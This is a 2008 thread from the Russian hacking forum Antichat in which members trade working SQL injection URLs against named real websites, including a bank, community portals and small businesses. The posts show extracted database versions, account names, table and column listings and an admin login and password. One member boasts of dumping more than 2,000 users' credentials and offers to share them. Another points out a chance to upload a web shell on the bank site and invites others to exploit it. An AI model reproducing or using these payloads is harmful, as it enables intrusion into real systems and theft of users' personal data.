Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

26.02.2008, 13:31
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме: 394753
Репутация:
120
|
|
http://www.atempo.com.tr/index.php?id=-442+union+select+1,user(),3,database(),5,6,7/*
user=atempoc_aboo@localhost
database=atempoc_atempo
varsion=4.0.26-log
Последний раз редактировалось neon_fx; 26.02.2008 в 13:36..
|
|
|

26.02.2008, 13:43
|
|
Новичок
Регистрация: 06.02.2008
Сообщений: 4
Провел на форуме: 34554
Репутация:
1
|
|
http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&t ype=DESC
POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
name=1&mail=1&url=1&captcha=1&captcha_hash='&refer er=1&parentID=1&type=1&ip=1&savevisitorcomment=1
POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha =1&captcha_hash='&save=1
Скажите как вытянуть отсюда что-нибудь!!!!???
|
|
|

26.02.2008, 13:54
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
Сообщение от wol4ara2
Скажите как вытянуть отсюда что-нибудь!!!!???
вопросы задаем в другом топике.. -20 
=======================================
#######sql_inj#######
http://www.hanima.com/new/gcat.php?l=2&uid=70dm9ftguhnb6n5estcl76vlh1&gcat=4 +union+select+1,2,3,4,concat(version(),0x3a,user() ,0x3a,database()),6,7,8,9/*
---------------info------------
4.1.20:hanima@localhost:hanima
#######sql_inj#######
http://frvmedia.com/1-communiques.php?xlang=fr&xid=-132'+union+select+1,2,3,concat(version(),0x3a,user (),0x3a,database()),5,6,7/*
---------------info------------
5.0.45:frvmedia_admin@localhost:frvmedia_main
Последний раз редактировалось xcedz; 26.02.2008 в 14:26..
|
|
|

26.02.2008, 14:57
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме: 394753
Репутация:
120
|
|
http://www.6seconds.org/cert/show.php?ID=-68+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,database(),22,23,24,25,26,27 ,28,version(),30,31,32,33,34,35,36,37,38,39/*
6cert@localhost 6
certlist
5.0.45-community
|
|
|

26.02.2008, 15:13
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме: 1379382
Репутация:
378
|
|
во, млин, запарило... по работе нужно лазить по чужим сайтам с ВЕЧЕРНИМИ ПЛАТЬЯМИ и смотреть разные фишки на сайтах...
после 10-го или 15-го решил отвлечься:
результат:
http://www.solange.ru/gallery/shop.phtm?s=99999+union+select+1,VERSION(),3,4,5/*
4.1.21-standard
intermoda@83.69.224.34
intermoda
|
|
|

26.02.2008, 18:03
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме: 1698585
Репутация:
818
|
|
www.humanmedia.ru
Наша компания является эксклюзивным продавцом рекламного времени на тематических каналах «НТВ-Плюс». Фактически это новый инструмент рекламных коммуникаций.
version() >5 (information_schema)
_http://www.humanmedia.ru/page.php?id=2+and+1=-1+union+select+1,concat(0xEBEEE3E8ED202D20,login,0 x3C62723E,0xEFE0F0EEEBFC202D20,password,0x3C62723E EFF0E8E2FB202D20,priv),3,4,5,6,7,8,9,10+from+tv_ad mins
логин - nets
пароль - nets
привы - 1
17:tv_admins
18:tv_ban
19:tv_news
20:tv_pages
21:tv_sample
22:tv_subscribe
23:tv_subscribe_delivery
24:tv_variables
20:tv_pages
20:--1:title
20:--2:body
20:--3:description1
20:--4:description2
20:--5:description3
20:--6  riority
20:--7  ublic
20:--8  id
20:--9:menu
17:tv_admins
17:--1:login
17:--2  assword
17:--3:name
17:--4:email
17:--5  riv
Админку ненашел 8( письмо админу отправил 8)
|
|
|

26.02.2008, 20:41
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
-------------------------------
5.0.37-log
life
life@localhost
-------------------------------
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/*
-------------------------------
есть интересные таблицы: (но я их не перебирал)
board_admin_comment
f1
f1_bodies
f2
f2_bodies
f3
f3_bodies
f4
f4_bodies
f5
f5_bodies
forums
forums_auth
forums_forum2group
forums_groups
forums_moderators
forums_user2group
gal_user
guide
mail_archieve
maillist
maillist_users
poll_poll
poll_vote
prob
---------------------
если кто вытянет полную базу-киньте в личку(интересно посмотреть, а колупаться дальше влом 
|
|
|

27.02.2008, 02:24
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
И снова горе веб-дизайнеры: "GiG Web solutions" Киев
Форум - Web программирование  (PHP,HTML,CSS,JavaScript,ASP)
_http://gig.kiev.ua/show_message.php?conf_id=-8+union+select+1,aes_decrypt(aes_encrypt(user(),0x 71),0x71),3,4,5,6/*&upper_id=0
gigkievua_user@localhost
gigkievua_db1
5.0.41-community
ветка пятая, раскручивать не стал
КТО ИМ ДАЁТ ДЕНЕГ???
|
|
|

27.02.2008, 04:09
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
все таки решил добить сам. пользователей больше 2000 (у меня пока 700, но скоро добъю) вывод типа имя пользователя,пароль,имя,мы о,аська(оч много элитных. Хотел бы себе  ) кому надо обращайтесь в личку поделюсь.
------------------------------
прошу прощенья, если не в этой теме. Не наказывайте пожалуйста 
|
|
|

27.02.2008, 13:21
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме: 1379382
Репутация:
378
|
|
банкирЫЫЫ -)
мда, все-таки решил выложить на благо родного ачата...
ВНИМАНИЕ: Сегодня у нас БАНК (точнее сайт онлайн банкинга) - дырявый как windows 98 =)
Версия мускула - 5 с хреном, соответственно, есть доступ к :
_http://www.mcb-bank.com/index.php?nd=menu&id=9999+union+select+1,TABLE_NAM E,3,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*
Наиболее приглянувшиеся мне таблицы:
===================================
isearch_admin_log
messages
message_id
message_image
message_month
message_year
message_title
specials
id
titel
text
image
active
...
users
id
username
password
admin
lastlogin
===================================
и самое интересное - КАВЫЧКИ НЕ ФИЛЬТРУЮТСЯ ВООБЩЕ!!!
так что, есть возможность залить шелл.
Вобщем, пользуйтесь на здоровье 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|